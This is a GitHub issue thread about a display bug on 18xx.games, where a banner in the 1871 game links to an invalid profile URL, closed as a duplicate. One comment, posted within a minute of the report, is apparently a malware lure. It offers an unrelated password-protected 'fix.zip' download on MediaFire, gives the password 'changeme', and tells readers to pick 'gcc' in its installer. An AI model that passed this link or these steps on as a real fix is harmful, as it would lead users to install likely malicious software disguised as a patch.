### ISSUE TITLE
[TOP 1871] Weird URL link

### ISSUE THREAD

**Issue by ChrisTheCat** [tobymao/18xx#11176] opened 2024-08-26 04:27 UTC
https://18xx.games/game/173730?action=651

Scroll down and hover the mouse over the banner in the Union Bank charter.

<img width="392" alt="Screenshot 2024-08-25 at 21 24 13" src="https://github.com/user-attachments/assets/04b178c3-6973-42ac-8297-b9ad1287cb71">

It opens this: https://18xx.games/profile/-1

<img width="435" alt="Screenshot 2024-08-25 at 21 24 21" src="https://github.com/user-attachments/assets/412dacd3-eb99-4ee8-9668-c94fc8e7cba2">

**Comment by llowvxe** [comment] 2024-08-26 04:27
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ollybh** [comment] 2024-08-26 08:43
Duplicate of #11124.

**Closed** 2024-08-26 08:44 UTC
Labels: duplicate
